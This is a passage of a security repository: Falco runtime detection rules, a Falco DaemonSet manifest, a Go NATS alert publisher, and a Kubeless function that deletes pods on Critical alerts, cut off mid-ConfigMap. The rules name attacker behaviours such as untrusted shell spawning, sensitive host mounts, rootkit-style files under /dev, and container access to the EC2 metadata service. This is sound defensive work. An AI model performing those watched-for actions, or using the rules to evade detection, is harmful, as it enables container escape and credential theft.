macro: consul_running_alert_checks 1025 | condition: (proc.pname=consul and proc.cmdline startswith "sh -c /bin/consul-alerts") 1026 | 1027 | - macro: serf_script 1028 | condition: (proc.cmdline startswith "sh -c serf") 1029 | 1030 | - macro: check_process_status 1031 | condition: (proc.cmdline startswith "sh -c kill -0 ") 1032 | 1033 | # In some cases, you may want to consider node processes run directly 1034 | # in containers as protected shell spawners. Examples include using 1035 | # pm2-docker or pm2 start some-app.js --no-daemon-mode as the direct 1036 | # entrypoint of the container, and when the node app is a long-lived 1037 | # server using something like express. 1038 | # 1039 | # However, there are other uses of node related to build pipelines for 1040 | # which node is not really a server but instead a general scripting 1041 | # tool. In these cases, shells are very likely and in these cases you 1042 | # don't want to consider node processes protected shell spawners. 1043 | # 1044 | # We have to choose one of these cases, so we consider node processes 1045 | # as unprotected by default. If you want to consider any node process 1046 | # run in a container as a protected shell spawner, override the below 1047 | # macro to remove the "never_true" clause, which allows it to take effect. 
1048 | - macro: possibly_node_in_container 1049 | condition: (never_true and (proc.pname=node and proc.aname[3]=docker-containe)) 1050 | 1051 | - macro: protected_shell_spawner 1052 | condition: > 1053 | (proc.aname in (protected_shell_spawning_binaries) 1054 | or parent_java_running_zookeeper 1055 | or parent_java_running_kafka 1056 | or parent_java_running_elasticsearch 1057 | or parent_java_running_activemq 1058 | or parent_java_running_cassandra 1059 | or parent_java_running_jboss_wildfly 1060 | or parent_java_running_glassfish 1061 | or parent_java_running_hadoop 1062 | or parent_java_running_datastax 1063 | or possibly_node_in_container) 1064 | 1065 | - list: mesos_shell_binaries 1066 | items: [mesos-docker-ex, mesos-slave, mesos-health-ch] 1067 | 1068 | # Note that runsv is both in protected_shell_spawner and the 1069 | # exclusions by pname. This means that runsv can itself spawn shells 1070 | # (the ./run and ./finish scripts), but the processes runsv starts can not 1071 | # spawn shells. 1072 | - rule: Run shell untrusted 1073 | desc: an attempt to spawn a shell below a non-shell application. Specific applications are monitored. 
1074 | condition: > 1075 | spawned_process 1076 | and shell_procs 1077 | and proc.pname exists 1078 | and protected_shell_spawner 1079 | and not proc.pname in (shell_binaries, gitlab_binaries, cron_binaries, user_known_shell_spawn_binaries, 1080 | needrestart_binaries, 1081 | mesos_shell_binaries, 1082 | erl_child_setup, exechealthz, 1083 | PM2, PassengerWatchd, c_rehash, svlogd, logrotate, hhvm, serf, 1084 | lb-controller, nvidia-installe, runsv, statsite, erlexec) 1085 | and not proc.cmdline in (known_shell_spawn_cmdlines) 1086 | and not proc.aname in (unicorn_launche) 1087 | and not consul_running_net_scripts 1088 | and not consul_running_alert_checks 1089 | and not nginx_starting_nginx 1090 | and not nginx_running_aws_s3_cp 1091 | and not run_by_package_mgmt_binaries 1092 | and not serf_script 1093 | and not check_process_status 1094 | and not run_by_foreman 1095 | and not python_mesos_marathon_scripting 1096 | and not splunk_running_forwarder 1097 | and not postgres_running_wal_e 1098 | and not redis_running_prepost_scripts 1099 | and not rabbitmq_running_scripts 1100 | and not rabbitmqctl_running_scripts 1101 | and not user_shell_container_exclusions 1102 | output: > 1103 | Shell spawned by untrusted binary (user=%user.name shell=%proc.name parent=%proc.pname 1104 | cmdline=%proc.cmdline pcmdline=%proc.pcmdline gparent=%proc.aname[2] ggparent=%proc.aname[3] 1105 | gggparent=%proc.aname[4] ggggparent=%proc.aname[5]) 1106 | priority: DEBUG 1107 | tags: [shell] 1108 | 1109 | - macro: trusted_containers 1110 | condition: (container.image startswith sysdig/agent or 1111 | (container.image startswith sysdig/falco and 1112 | not container.image startswith sysdig/falco-event-generator) or 1113 | container.image startswith quay.io/sysdig or 1114 | container.image startswith sysdig/sysdig or 1115 | container.image startswith gcr.io/google_containers/hyperkube or 1116 | container.image startswith quay.io/coreos/flannel or 1117 | container.image startswith 
gcr.io/google_containers/kube-proxy or 1118 | container.image startswith calico/node or 1119 | container.image startswith rook/toolbox or 1120 | container.image startswith registry.access.redhat.com/openshift3/logging-fluentd or 1121 | container.image startswith registry.access.redhat.com/openshift3/logging-elasticsearch or 1122 | container.image startswith registry.access.redhat.com/openshift3/metrics-cassandra or 1123 | container.image startswith openshift3/ose-sti-builder or 1124 | container.image startswith registry.access.redhat.com/openshift3/ose-sti-builder or 1125 | container.image startswith cloudnativelabs/kube-router or 1126 | container.image startswith "consul:" or 1127 | container.image startswith mesosphere/mesos-slave or 1128 | container.image startswith istio/proxy_ or 1129 | container.image startswith datadog/docker-dd-agent) 1130 | 1131 | # Add conditions to this macro (probably in a separate file, 1132 | # overwriting this macro) to specify additional containers that are 1133 | # trusted and therefore allowed to run privileged. 1134 | # 1135 | # In this file, it just takes one of the images in trusted_containers 1136 | # and repeats it. 1137 | - macro: user_trusted_containers 1138 | condition: (container.image startswith sysdig/agent) 1139 | 1140 | # Add conditions to this macro (probably in a separate file, 1141 | # overwriting this macro) to specify additional containers that are 1142 | # allowed to perform sensitive mounts. 1143 | # 1144 | # In this file, it just takes one of the images in trusted_containers 1145 | # and repeats it. 1146 | - macro: user_sensitive_mount_containers 1147 | condition: (container.image startswith sysdig/agent) 1148 | 1149 | - rule: Launch Privileged Container 1150 | desc: Detect the initial process started in a privileged container. Exceptions are made for known trusted images. 
1151 | condition: > 1152 | evt.type=execve and proc.vpid=1 and container 1153 | and container.privileged=true 1154 | and not trusted_containers 1155 | and not user_trusted_containers 1156 | output: Privileged container started (user=%user.name command=%proc.cmdline %container.info image=%container.image) 1157 | priority: INFO 1158 | tags: [container, cis] 1159 | 1160 | # For now, only considering a full mount of /etc as 1161 | # sensitive. Ideally, this would also consider all subdirectories 1162 | # below /etc as well, but the globbing mechanism used by sysdig 1163 | # doesn't allow exclusions of a full pattern, only single characters. 1164 | - macro: sensitive_mount 1165 | condition: (container.mount.dest[/proc*] != "N/A" or 1166 | container.mount.dest[/var/run/docker.sock] != "N/A" or 1167 | container.mount.dest[/] != "N/A" or 1168 | container.mount.dest[/etc] != "N/A" or 1169 | container.mount.dest[/root*] != "N/A") 1170 | 1171 | # The steps libcontainer performs to set up the root program for a container are: 1172 | # - clone + exec self to a program runc:[0:PARENT] 1173 | # - clone a program runc:[1:CHILD] which sets up all the namespaces 1174 | # - clone a second program runc:[2:INIT] + exec to the root program. 1175 | # The parent of runc:[2:INIT] is runc:[0:PARENT]. 1176 | # As soon as 1:CHILD is created, 0:PARENT exits, so there's a race 1177 | # where at the time 2:INIT execs the root program, 0:PARENT might have 1178 | # already exited, or might still be around. So we handle both. 1179 | # We also let runc:[1:CHILD] count as the parent process, which can occur 1180 | # when we lose events and lose track of state. 1181 | 1182 | - macro: container_entrypoint 1183 | condition: (not proc.pname exists or proc.pname in (runc:[0:PARENT], runc:[1:CHILD], docker-runc, exe)) 1184 | 1185 | - rule: Launch Sensitive Mount Container 1186 | desc: > 1187 | Detect the initial process started by a container that has a mount from a sensitive host directory 1188 | (i.e. 
/proc). Exceptions are made for known trusted images. 1189 | condition: > 1190 | evt.type=execve and proc.vpid=1 and container 1191 | and sensitive_mount 1192 | and not trusted_containers 1193 | and not user_sensitive_mount_containers 1194 | output: Container with sensitive mount started (user=%user.name command=%proc.cmdline %container.info image=%container.image mounts=%container.mounts) 1195 | priority: INFO 1196 | tags: [container, cis] 1197 | 1198 | # In a local/user rules file, you could override this macro to 1199 | # explicitly enumerate the container images that you want to run in 1200 | # your environment. In this main falco rules file, there isn't any way 1201 | # to know all the containers that can run, so any container is 1202 | # allowed, by using a filter that is guaranteed to evaluate to true 1203 | # (the same proc.vpid=1 that's in the Launch Disallowed Container 1204 | # rule). In the overridden macro, the condition would look something 1205 | # like (container.image startswith vendor/container-1 or 1206 | # container.image startswith vendor/container-2 or ...) 1207 | 1208 | - macro: allowed_containers 1209 | condition: (proc.vpid=1) 1210 | 1211 | - rule: Launch Disallowed Container 1212 | desc: > 1213 | Detect the initial process started by a container that is not in a list of allowed containers. 
1214 | condition: evt.type=execve and proc.vpid=1 and container and not allowed_containers 1215 | output: Container started and not in allowed list (user=%user.name command=%proc.cmdline %container.info image=%container.image) 1216 | priority: WARNING 1217 | tags: [container] 1218 | 1219 | # Anything run interactively by root 1220 | # - condition: evt.type != switch and user.name = root and proc.name != sshd and interactive 1221 | # output: "Interactive root (%user.name %proc.name %evt.dir %evt.type %evt.args %fd.name)" 1222 | # priority: WARNING 1223 | 1224 | - rule: System user interactive 1225 | desc: an attempt to run interactive commands by a system (i.e. non-login) user 1226 | condition: spawned_process and system_users and interactive 1227 | output: "System user ran an interactive command (user=%user.name command=%proc.cmdline)" 1228 | priority: INFO 1229 | tags: [users] 1230 | 1231 | - rule: Terminal shell in container 1232 | desc: A shell was used as the entrypoint/exec point into a container with an attached terminal. 1233 | condition: > 1234 | spawned_process and container 1235 | and shell_procs and proc.tty != 0 1236 | and container_entrypoint 1237 | output: > 1238 | A shell was spawned in a container with an attached terminal (user=%user.name %container.info 1239 | shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty) 1240 | priority: NOTICE 1241 | tags: [container, shell] 1242 | 1243 | # For some container types (mesos), there isn't a container image to 1244 | # work with, and the container name is autogenerated, so there isn't 1245 | # any stable aspect of the software to work with. In this case, we 1246 | # fall back to allowing certain command lines. 
1247 | 1248 | - list: known_shell_spawn_cmdlines 1249 | items: [ 1250 | '"sh -c uname -p 2> /dev/null"', 1251 | '"sh -c uname -s 2>&1"', 1252 | '"sh -c uname -r 2>&1"', 1253 | '"sh -c uname -v 2>&1"', 1254 | '"sh -c uname -a 2>&1"', 1255 | '"sh -c ruby -v 2>&1"', 1256 | '"sh -c getconf CLK_TCK"', 1257 | '"sh -c getconf PAGESIZE"', 1258 | '"sh -c LC_ALL=C LANG=C /sbin/ldconfig -p 2>/dev/null"', 1259 | '"sh -c LANG=C /sbin/ldconfig -p 2>/dev/null"', 1260 | '"sh -c /sbin/ldconfig -p 2>/dev/null"', 1261 | '"sh -c stty -a 2>/dev/null"', 1262 | '"sh -c stty -a < /dev/tty"', 1263 | '"sh -c stty -g < /dev/tty"', 1264 | '"sh -c node index.js"', 1265 | '"sh -c node index"', 1266 | '"sh -c node ./src/start.js"', 1267 | '"sh -c node app.js"', 1268 | '"sh -c node -e \"require(''nan'')\""', 1269 | '"sh -c node -e \"require(''nan'')\")"', 1270 | '"sh -c node $NODE_DEBUG_OPTION index.js "', 1271 | '"sh -c crontab -l 2"', 1272 | '"sh -c lsb_release -a"', 1273 | '"sh -c lsb_release -is 2>/dev/null"', 1274 | '"sh -c whoami"', 1275 | '"sh -c node_modules/.bin/bower-installer"', 1276 | '"sh -c /bin/hostname -f 2> /dev/null"', 1277 | '"sh -c locale -a"', 1278 | '"sh -c -t -i"', 1279 | '"sh -c openssl version"', 1280 | '"bash -c id -Gn kafadmin"', 1281 | '"sh -c /bin/sh -c ''date +%%s''"' 1282 | ] 1283 | 1284 | # This list allows for easy additions to the set of commands allowed 1285 | # to run shells in containers without having to copy 1286 | # and override the entire run shell in container macro. Once 1287 | # https://github.com/draios/falco/issues/255 is fixed this will be a 1288 | # bit easier, as someone could append to any of the existing lists. 1289 | - list: user_known_shell_spawn_binaries 1290 | items: [] 1291 | 1292 | # This macro allows for easy additions to the set of commands allowed 1293 | # to run shells in containers without having to override the entire 
# rule. Its default value is an expression that is always false, which 1294 | # becomes true when the "not ..." in the rule is applied. 1295 | 1296 | - macro: user_shell_container_exclusions 1297 | condition: (never_true) 1298 | 1299 | - macro: login_doing_dns_lookup 1300 | condition: (proc.name=login and fd.l4proto=udp and fd.sport=53) 1301 | 1302 | # sockfamily ip is to exclude certain processes (like 'groups') that communicate on unix-domain sockets 1303 | # systemd can listen on ports to launch things like sshd on demand 1304 | - rule: System procs network activity 1305 | desc: any network activity performed by system binaries that are not expected to send or receive any network traffic 1306 | condition: > 1307 | (fd.sockfamily = ip and system_procs) 1308 | and (inbound or outbound) 1309 | and not proc.name in (systemd, hostid) 1310 | and not login_doing_dns_lookup 1311 | output: > 1312 | Known system binary sent/received network traffic 1313 | (user=%user.name command=%proc.cmdline connection=%fd.name) 1314 | priority: NOTICE 1315 | tags: [network] 1316 | 1317 | # With the current restriction on system calls handled by falco 1318 | # (e.g. excluding read/write/sendto/recvfrom/etc.), this rule won't 1319 | # trigger. 1320 | # - rule: Ssh error in syslog 1321 | # desc: any ssh errors (failed logins, disconnects, ...) 
sent to syslog 1322 | # condition: syslog and ssh_error_message and evt.dir = < 1323 | # output: "sshd sent error message to syslog (error=%evt.buffer)" 1324 | # priority: WARNING 1325 | 1326 | - macro: somebody_becoming_themself 1327 | condition: ((user.name=nobody and evt.arg.uid=nobody) or 1328 | (user.name=www-data and evt.arg.uid=www-data) or 1329 | (user.name=_apt and evt.arg.uid=_apt) or 1330 | (user.name=postfix and evt.arg.uid=postfix) or 1331 | (user.name=pki-agent and evt.arg.uid=pki-agent) or 1332 | (user.name=pki-acme and evt.arg.uid=pki-acme) or 1333 | (user.name=nfsnobody and evt.arg.uid=nfsnobody) or 1334 | (user.name=postgres and evt.arg.uid=postgres)) 1335 | 1336 | - macro: nrpe_becoming_nagios 1337 | condition: (proc.name=nrpe and evt.arg.uid=nagios) 1338 | 1339 | # In containers, the user name might be for a uid that exists in the 1340 | # container but not on the host. (See 1341 | # https://github.com/draios/sysdig/issues/954). So in that case, allow 1342 | # a setuid. 1343 | - macro: known_user_in_container 1344 | condition: (container and user.name != "N/A") 1345 | 1346 | # sshd, mail programs attempt to setuid to root even when running as non-root. Excluding here to avoid meaningless FPs 1347 | - rule: Non sudo setuid 1348 | desc: > 1349 | an attempt to change users by calling setuid. sudo/su are excluded. users "root" and "nobody" 1350 | su'ing to themselves are also excluded, as setuid calls typically involve dropping privileges. 
1351 | condition: > 1352 | evt.type=setuid and evt.dir=> 1353 | and (known_user_in_container or not container) 1354 | and not user.name=root and not somebody_becoming_themself 1355 | and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries, 1356 | nomachine_binaries) 1357 | and not java_running_sdjagent 1358 | and not nrpe_becoming_nagios 1359 | output: > 1360 | Unexpected setuid call by non-sudo, non-root program (user=%user.name cur_uid=%user.uid parent=%proc.pname 1361 | command=%proc.cmdline uid=%evt.arg.uid) 1362 | priority: NOTICE 1363 | tags: [users] 1364 | 1365 | - rule: User mgmt binaries 1366 | desc: > 1367 | activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded. 1368 | Activity in containers is also excluded--some containers create custom users on top 1369 | of a base linux distribution at startup. 1370 | Some innocuous commandlines that don't actually change anything are excluded. 1371 | condition: > 1372 | spawned_process and proc.name in (user_mgmt_binaries) and 1373 | not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and 1374 | not proc.pname in (cron_binaries, systemd, systemd.postins, udev.postinst, run-parts) and 1375 | not proc.cmdline startswith "passwd -S" and 1376 | not proc.cmdline startswith "useradd -D" and 1377 | not proc.cmdline startswith "systemd --version" and 1378 | not run_by_qualys and 1379 | not run_by_sumologic_securefiles and 1380 | not run_by_yum and 1381 | not run_by_ms_oms and 1382 | not run_by_google_accounts_daemon 1383 | output: > 1384 | User management binary command run outside of container 1385 | (user=%user.name command=%proc.cmdline parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4]) 1386 | priority: NOTICE 1387 | tags: [host, users] 1388 | 1389 | - list: allowed_dev_files 1390 | items: [ 1391 | /dev/null, /dev/stdin, /dev/stdout, /dev/stderr, 1392 | /dev/random, 
/dev/urandom, /dev/console, /dev/kmsg 1393 | ] 1394 | 1395 | # (we may need to add additional checks against false positives, see: 1396 | # https://bugs.launchpad.net/ubuntu/+source/rkhunter/+bug/86153) 1397 | - rule: Create files below dev 1398 | desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev. 1399 | condition: > 1400 | fd.directory = /dev and 1401 | (evt.type = creat or (evt.type = open and evt.arg.flags contains O_CREAT)) 1402 | and not proc.name in (dev_creation_binaries) 1403 | and not fd.name in (allowed_dev_files) 1404 | and not fd.name startswith /dev/tty 1405 | output: "File created below /dev by untrusted program (user=%user.name command=%proc.cmdline file=%fd.name)" 1406 | priority: ERROR 1407 | tags: [filesystem] 1408 | 1409 | 1410 | # In a local/user rules file, you could override this macro to 1411 | # explicitly enumerate the container images that you want to allow 1412 | # access to EC2 metadata. In this main falco rules file, there isn't 1413 | # any way to know all the containers that should have access, so any 1414 | # container is allowed, by repeating the "container" macro. In the 1415 | # overridden macro, the condition would look something like 1416 | # (container.image startswith vendor/container-1 or container.image 1417 | # startswith vendor/container-2 or ...) 1418 | - macro: ec2_metadata_containers 1419 | condition: container 1420 | 1421 | # On EC2 instances, 169.254.169.254 is a special IP used to fetch 1422 | # metadata about the instance. It may be desirable to prevent access 1423 | # to this IP from containers. 
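# As an illustration only (the image names below are hypothetical
# placeholders, not images from this repository), an override placed in
# falco_rules.local.yaml that limits EC2 metadata access to specific
# images could look like:
#
# - macro: ec2_metadata_containers
#   condition: (container.image startswith vendor/ec2-tooling or
#     container.image startswith vendor/cloud-init-helper)
#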
1424 | - rule: Contact EC2 Instance Metadata Service From Container 1425 | desc: Detect attempts to contact the EC2 Instance Metadata Service from a container 1426 | condition: outbound and fd.sip="169.254.169.254" and container and not ec2_metadata_containers 1427 | output: Outbound connection to EC2 instance metadata service (command=%proc.cmdline connection=%fd.name %container.info image=%container.image) 1428 | priority: NOTICE 1429 | tags: [network, aws, container] 1430 | 1431 | # In a local/user rules file, you should override this macro with the 1432 | # IP address of your k8s api server. The IP 1.2.3.4 is a placeholder 1433 | # IP that is not likely to be seen in practice. 1434 | - macro: k8s_api_server 1435 | condition: (fd.sip="1.2.3.4" and fd.sport=8080) 1436 | 1437 | # In a local/user rules file, list the container images that are 1438 | # allowed to contact the K8s API Server from within a container. This 1439 | # might cover cases where the K8s infrastructure itself is running 1440 | # within a container. 1441 | - macro: k8s_containers 1442 | condition: > 1443 | (container.image startswith gcr.io/google_containers/hyperkube-amd64 or 1444 | container.image startswith gcr.io/google_containers/kube2sky or 1445 | container.image startswith sysdig/agent or 1446 | container.image startswith sysdig/falco or 1447 | container.image startswith sysdig/sysdig) 1448 | 1449 | - rule: Contact K8S API Server From Container 1450 | desc: Detect attempts to contact the K8S API Server from a container 1451 | condition: outbound and k8s_api_server and container and not k8s_containers 1452 | output: Unexpected connection to K8s API Server from container (command=%proc.cmdline %container.info image=%container.image connection=%fd.name) 1453 | priority: NOTICE 1454 | tags: [network, k8s, container] 1455 | 1456 | # In a local/user rules file, list the container images that are 1457 | # allowed to contact NodePort services from within a container. 
This 1458 | # might cover cases where the K8s infrastructure itself is running 1459 | # within a container. 1460 | # 1461 | # By default, all containers are allowed to contact NodePort services. 1462 | - macro: nodeport_containers 1463 | condition: container 1464 | 1465 | - rule: Unexpected K8s NodePort Connection 1466 | desc: Detect attempts to use K8s NodePorts from a container 1467 | condition: (outbound or inbound) and fd.sport >= 30000 and fd.sport <= 32767 and container and not nodeport_containers 1468 | output: Unexpected K8s NodePort Connection (command=%proc.cmdline connection=%fd.name) 1469 | priority: NOTICE 1470 | tags: [network, k8s, container] 1471 | 1472 | # Application rules have moved to application_rules.yaml. Please look 1473 | # there if you want to enable them by adding to 1474 | # falco_rules.local.yaml. 1475 | 1476 | -------------------------------------------------------------------------------- /falco-daemonset-configmap.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: DaemonSet 3 | metadata: 4 | name: falco 5 | labels: 6 | name: falco-daemonset 7 | app: demo 8 | spec: 9 | template: 10 | metadata: 11 | labels: 12 | name: falco 13 | app: demo 14 | role: security 15 | spec: 16 | serviceAccount: falco-account 17 | containers: 18 | - name: falco-nats 19 | image: sysdiglabs/falco-nats:latest 20 | imagePullPolicy: Always 21 | volumeMounts: 22 | - mountPath: /var/run/falco/ 23 | name: shared-pipe 24 | - name: falco 25 | image: sysdig/falco:latest 26 | securityContext: 27 | privileged: true 28 | args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes", "-pk", "-U"] 29 | volumeMounts: 30 | - mountPath: /var/run/falco/ 31 | name: shared-pipe 32 | readOnly: false 33 | - mountPath: /host/var/run/docker.sock 34 | name: docker-socket 35 | readOnly: true 36 | - mountPath: /host/dev 37 | name: dev-fs 38 | readOnly: 
true 39 | - mountPath: /host/proc 40 | name: proc-fs 41 | readOnly: true 42 | - mountPath: /host/boot 43 | name: boot-fs 44 | readOnly: true 45 | - mountPath: /host/lib/modules 46 | name: lib-modules 47 | readOnly: true 48 | - mountPath: /host/usr 49 | name: usr-fs 50 | readOnly: true 51 | - mountPath: /etc/falco 52 | name: falco-config 53 | initContainers: 54 | - name: init-pipe 55 | image: busybox 56 | command: ['mkfifo','/var/run/falco/nats'] 57 | volumeMounts: 58 | - mountPath: /var/run/falco/ 59 | name: shared-pipe 60 | readOnly: false 61 | volumes: 62 | - name: shared-pipe 63 | emptyDir: {} 64 | - name: docker-socket 65 | hostPath: 66 | path: /var/run/docker.sock 67 | - name: dev-fs 68 | hostPath: 69 | path: /dev 70 | - name: proc-fs 71 | hostPath: 72 | path: /proc 73 | - name: boot-fs 74 | hostPath: 75 | path: /boot 76 | - name: lib-modules 77 | hostPath: 78 | path: /lib/modules 79 | - name: usr-fs 80 | hostPath: 81 | path: /usr 82 | - name: falco-config 83 | configMap: 84 | name: falco-config 85 | -------------------------------------------------------------------------------- /falco-nats/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:latest 2 | 3 | COPY ./nats-pub /bin/ 4 | 5 | CMD ["/bin/nats-pub"] 6 | -------------------------------------------------------------------------------- /falco-nats/Makefile: -------------------------------------------------------------------------------- 1 | DOCKER_ORG := sysdiglabs 2 | IMAGE := $(if $(HUB),$(HUB)/)$(DOCKER_ORG)/falco-nats 3 | 4 | 5 | all: linux image 6 | 7 | linux: 8 | # Compile statically linked binary for linux. 9 | GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -ldflags="-s" -o nats-pub nats-pub.go 10 | 11 | image: 12 | docker build -t "$(IMAGE):latest" . 
13 | 14 | push: 15 | docker push "$(IMAGE):latest" 16 | -------------------------------------------------------------------------------- /falco-nats/nats-pub: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sysdiglabs/falco-nats/3dbb2740d4878dbee64c0c03116ce37abbc6a075/falco-nats/nats-pub -------------------------------------------------------------------------------- /falco-nats/nats-pub.go: -------------------------------------------------------------------------------- 1 | // Copyright 2012-2018 The NATS Authors 2 | // Licensed under the Apache License, Version 2.0 (the "License"); 3 | // you may not use this file except in compliance with the License. 4 | // You may obtain a copy of the License at 5 | // 6 | // http://www.apache.org/licenses/LICENSE-2.0 7 | // 8 | // Unless required by applicable law or agreed to in writing, software 9 | // distributed under the License is distributed on an "AS IS" BASIS, 10 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 11 | // See the License for the specific language governing permissions and 12 | // limitations under the License. 
13 | 14 | // +build ignore 15 | 16 | package main 17 | 18 | import ( 19 | "flag" 20 | "log" 21 | "os" 22 | "bufio" 23 | "github.com/nats-io/go-nats" 24 | ) 25 | 26 | 27 | func usage() { 28 | log.Fatalf("Usage: nats-pub [-s server (%s)] [-f pipe path]\n", nats.DefaultURL) 29 | } 30 | 31 | 32 | func main() { 33 | var urls = flag.String("s", "nats://nats.nats-io.svc.cluster.local:4222", "The nats server URLs (separated by comma)") 34 | var pipePath = flag.String("f", "/var/run/falco/nats", "The named pipe path") 35 | var subj = "FALCO" 36 | 37 | log.SetFlags(0) 38 | flag.Usage = usage 39 | flag.Parse() 40 | 41 | 42 | nc, err := nats.Connect(*urls) 43 | if err != nil { 44 | log.Fatal(err) 45 | } 46 | defer nc.Close() 47 | 48 | pipe, err := os.OpenFile(*pipePath, os.O_RDONLY, 0600) 49 | if err != nil { 50 | log.Fatal(err) 51 | } 52 | 53 | log.Printf("Opened pipe %s", *pipePath) 54 | 55 | reader := bufio.NewReader(pipe) 56 | scanner := bufio.NewScanner(reader) 57 | 58 | log.Printf("Scanning %s", *pipePath) 59 | 60 | for scanner.Scan() { 61 | msg := []byte(scanner.Text()) 62 | 63 | nc.Publish(subj, msg) 64 | nc.Flush() 65 | 66 | if err := nc.LastError(); err != nil { 67 | log.Fatal(err) 68 | } else { 69 | log.Printf("Published [%s] : '%s'\n", subj, msg) 70 | } 71 | } 72 | 73 | } 74 | -------------------------------------------------------------------------------- /kubeless-function/README.md: -------------------------------------------------------------------------------- 1 | # Kubeless Function to Delete Kubernetes Pod 2 | 3 | This Kubeless function will delete a pod when a Falco alert is received from the NATS server topic `FALCO`. The Pod will only be deleted if the Falco alert is of `Critical` priority. Follow the [quick start instructions](http://kubeless.io/docs/quick-start/) on the Kubeless site to deploy Kubeless. 4 | 5 | Deploy the function as below. 
6 | 7 | ``` 8 | kubeless function deploy --from-file delete-pod.py --dependencies requirements.txt --runtime python2.7 --handler delete-pod.delete_pod falco-pod-delete 9 | INFO[0000] Deploying function... 10 | INFO[0000] Function falco-pod-delete submitted for deployment 11 | INFO[0000] Check the deployment status executing 'kubeless function ls falco-pod-delete' 12 | ``` 13 | 14 | Follow the instructions in the Kubeless quick start to create a NATS trigger controller and a trigger for our delete-pod function. 15 | 16 | ``` 17 | $ kubectl create -f https://github.com/kubeless/kubeless/releases/download/$RELEASE/nats-$RELEASE.yaml 18 | customresourcedefinition "natstriggers.kubeless.io" created 19 | deployment "nats-trigger-controller" created 20 | clusterrole "nats-controller-deployer" created 21 | clusterrolebinding "nats-controller-deployer" created 22 | 23 | $ kubeless trigger nats create falco-delete-pod-trigger --function-selector created-by=kubeless,function=falco-pod-delete --trigger-topic FALCO 24 | INFO[0000] NATS trigger falco-delete-pod-trigger created in namespace default successfully! 25 | 26 | ``` 27 | 28 | WARNING: 29 | 30 | For the function to work, you need to change the default service account used by Kubeless. 31 | 32 | First create a service account with the proper privileges: 33 | 34 | ``` 35 | kubectl create -f falco-pod-delete-account.yaml 36 | ``` 37 | 38 | 39 | Kubeless doesn't support specifying a `serviceAccountName` for a deployed function. As a workaround, edit the function's deployment to specify a `serviceAccountName` in the deployment object: 40 | 41 | ``` 42 | $ kubectl edit deployment falco-pod-delete 43 | securityContext: 44 | fsGroup: 1000 45 | runAsUser: 1000 46 | + serviceAccountName: falco-pod-delete 47 | terminationGracePeriodSeconds: 30 48 | volumes: 49 | 50 | ``` 51 | 52 | Kubernetes should start a new Pod running with the new `serviceAccount`. If it does not, delete the Pod associated with the Kubeless deployment so it is recreated.
53 | 54 | ``` 55 | $ kubectl delete pod falco-pod-delete- 56 | ``` 57 | 58 | Confirm the new service account on the new Pod. 59 | ``` 60 | $ kubectl get pod falco-pod-delete- -o yaml |grep serviceAccount 61 | serviceAccount: falco-pod-delete 62 | serviceAccountName: falco-pod-delete 63 | ``` 64 | 65 | When a Pod is deleted, the action is logged to the `stdout` of the `falco-pod-delete` Pod. -------------------------------------------------------------------------------- /kubeless-function/delete-pod.py: -------------------------------------------------------------------------------- 1 | from kubernetes import client,config 2 | 3 | # To run this locally, load your local kubeconfig with 4 | #config.load_kube_config() 5 | 6 | # Inside a cluster load the service account default kubeconfig with 7 | config.load_incluster_config() 8 | 9 | v1=client.CoreV1Api() 10 | 11 | body = client.V1DeleteOptions() 12 | 13 | 14 | def find_pod_ns(podname=None): 15 | ns=None 16 | response=v1.list_pod_for_all_namespaces(watch=False) 17 | for i in response.items: 18 | if i.metadata.name == podname: 19 | print 'Found Pod NS: {}\tPOD: {}'.format(i.metadata.namespace, i.metadata.name) 20 | ns=i.metadata.namespace 21 | break 22 | 23 | return ns 24 | 25 | def delete_pod(event, context): 26 | priority = event['data'].get('priority') 27 | output_fields = event['data'].get('output_fields') 28 | 29 | if priority == "Critical" and output_fields and output_fields.get('container.id', 'host') != "host": 30 | name = output_fields['k8s.pod.name'] 31 | print 'Critical Falco alert for pod: {}'.format(name) 32 | 33 | ns=find_pod_ns(name) 34 | if ns: 35 | print 'Deleting POD {} in NameSpace {}'.format(name, ns) 36 | v1.delete_namespaced_pod(name=name, namespace=ns, body=body) -------------------------------------------------------------------------------- /kubeless-function/falco-pod-delete-account.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 |
kind: ServiceAccount 3 | metadata: 4 | name: falco-pod-delete 5 | --- 6 | kind: ClusterRole 7 | apiVersion: rbac.authorization.k8s.io/v1beta1 8 | metadata: 9 | name: falco-pod-delete-cluster-role 10 | rules: 11 | - apiGroups: ["extensions",""] 12 | resources: ["pods"] 13 | verbs: ["get","list","delete"] 14 | --- 15 | kind: ClusterRoleBinding 16 | apiVersion: rbac.authorization.k8s.io/v1beta1 17 | metadata: 18 | name: falco-pod-delete-cluster-role-binding 19 | namespace: default 20 | subjects: 21 | - kind: ServiceAccount 22 | name: falco-pod-delete 23 | namespace: default 24 | roleRef: 25 | kind: ClusterRole 26 | name: falco-pod-delete-cluster-role 27 | apiGroup: rbac.authorization.k8s.io 28 | -------------------------------------------------------------------------------- /kubeless-function/kubeless-cm.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ConfigMap 3 | metadata: 4 | name: kubeless-config 5 | namespace: kubeless 6 | data: 7 | builder-image: kubeless/function-image-builder@sha256:fe484ad1cbcee69b707a0cb33e53551f39989219f56d4037c811705efa35a06d 8 | deployment: |- 9 | spec: 10 | template: 11 | serviceAccountName: falco-pod-delete 12 | enable-build-step: "false" 13 | function-registry-tls-verify: "true" 14 | ingress-enabled: "false" 15 | runtime-images: |- 16 | [ 17 | { 18 | "ID": "python", 19 | "compiled": false, 20 | "versions": [ 21 | { 22 | "name": "python27", 23 | "version": "2.7", 24 | "runtimeImage": 